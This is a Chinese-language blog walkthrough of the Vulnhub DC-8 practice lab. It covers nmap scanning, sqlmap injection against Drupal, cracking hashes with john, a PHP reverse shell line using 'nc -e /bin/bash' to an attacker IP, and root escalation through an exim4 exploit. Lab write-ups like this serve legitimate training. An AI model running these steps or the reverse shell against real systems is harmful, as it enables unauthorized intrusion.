当前位置:首页 > 网络安全 > 正文内容

Vulnhub靶机DC系列

访客4年前 (2021-04-15)网络安全597

0x0:靶场介绍

靶场名称: DC: 8

靶场发布时间:2019-9-8

靶场地址:https://www.vulnhub.com/entry/dc-8,367/

靶场描述:

DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.

The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.

You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

1x0:环境搭建

VMware虚拟机(桥接模式)

2x0:靶机渗透

获取靶机的IP

nmap -sn 192.168.3.0/24

使用nmap来查看靶机的端口信息和系统信息等等

首先去查看80端口的web服务 还是Drupal

提示不用爆破破解,使用dirb扫描一下目录

存在robots.txt文件

登录地址:

版本大致的判断:

这三个页面url中存在参数sqlmap去尝试一下

sqlmap确定存在sql注入

读取一下数据

drupal的密码是特殊加密的需要爆破破解,使用john

john pwd --wordlist=/usr/share/wordlists/rockyou.txt

john/turtle 登录页面

3x0:后台篇

登录后需要获取到shell

在页面中发现可以直接执行php语句

写入shell

<?php system("nc -e /bin/bash 192.168.3.20 1234"); ?>

反弹到kali中 随便提交数据

反弹成功

4x0:提权篇

切换shell

查看一下用户有那些

在看看有没有内核提权

find / -perm -u=s -type f 2>/dev/null 查看具有root权限的命令

查看一下exim4的版本 又没有漏洞

exim4 --version

https://www.exploit-db.com/exploits/46996找到一个可以使用的exp

下载exp,上传到靶机中并赋予权限

使用过程中报错了

需要对exp脚本 执行编码

vim 46996.sh

:set ff=unix

:wq

在重新上传到靶机中 提权(改完还是报错),直接复制代码在靶机中创建文件填写

执行成功。

获取到root权限

5x0:flag获取

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106578.html

分享给朋友:
返回列表

上一篇:微信恢复精灵(微信恢复精灵破解版)

下一篇:手机定位25元一个月是真的吗(手机是如何定位的)

“Vulnhub靶机DC系列” 的相关文章

创业板投资风险揭示书,创业板风险揭示书

保荐机构(主承销商):中泰证券股份有限公司 苏州天路光科技股份有限公司(以下简称“天路科技”、“发行人”或“公司”)首次公开发行不超过2579万股普通股(a股)(以下简称“本次发行”)的申请,已经深圳证券交易所(以下简称“深交所”)创业板上市委员会委员审议通过,并经中国证券监督管理委员会(以下...

【紧急+重要】勒索病毒解决方案!附:MS17-010补丁下载

  滚动更新:2017年5月13日16:57:22   游侠安全网(良心网站,站长先贴上注意事项和解决方法!防止你看本文的时候就被加密了!   1、本次共计是自动化攻击,利用了Windows的MS17-010。但苹果的MacOS用户不用得意,因为在昨晚之前,我这里得到的好几起勒索攻击案例都是针对...

Webshell安全检测篇(1)-根据流量的检测方法

一、概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分类笔者总结如下: 前段时...

二手路虎极光 「2015路虎极光二手车报价」

样子车而已论性能都有点给路2015虎家族丢脸了感觉如果选择这车还真不如选择霸道VX顶配69万那款实惠推荐其他车的话途锐很好Q7虽然多了点但是很值得考虑一下的这个价位如果讨论轿车的话上不了A8L和,公里数等。火烧。 二手车价格:41点00万,2013极光款2点0T AT圣诞限量版,车子没有。 2015...

记一次阿里云主机accesskey泄露到图形化工具开发

简介 在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET(阿里云API key),特别是laravel框架得debug信息。APP中也会泄露这些信息。 !!!下载链接在文末!!! 概述 我们说下阿里API有什么用吧,以下是...

济南楼盘价格一览表 「济南2021年交房楼盘表」

是中国房地产迅速扭转颓势,环球广场5400元·黄金时代,国字号企业开始大规模攻城略地%缴纳维修基金,前期物业公司收需要装修的,您好.按照套内,米交通位置:二环南路。 济南2018年上半年交房的小区有哪些共济南8个,并快速膨胀的一年。可以看看北边的房子了,煤气。 一期是2018年6月份交房2018-0...

评论列表

惑心忿咬
惑心忿咬
2年前 (2022-06-30)

sql注入读取一下数据drupal的密码是特殊加密的需要爆破破解,使用johnjohn pwd --wordlist=/usr/share/wordlists/rockyou.txtjohn/turtle 登录页面3x0:后台篇登录后需要获取到shell在页面中发现

回复该评论
只酷桃靥
只酷桃靥
2年前 (2022-06-30)

.sh:set ff=unix:wq在重新上传到靶机中 提权(改完还是报错),直接复制代码在靶机中创建文件填写执行成功。获取到root权限5x0:flag获取

回复该评论
温人情票
温人情票
2年前 (2022-06-30)

.txt文件登录地址:版本大致的判断:这三个页面url中存在参数sqlmap去尝试一下sqlmap确定存在sql注入读取一下数据drupal的密码是特殊加密的需要爆破破解,使用johnjo

回复该评论

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright Your WebSite.Some Rights Reserved.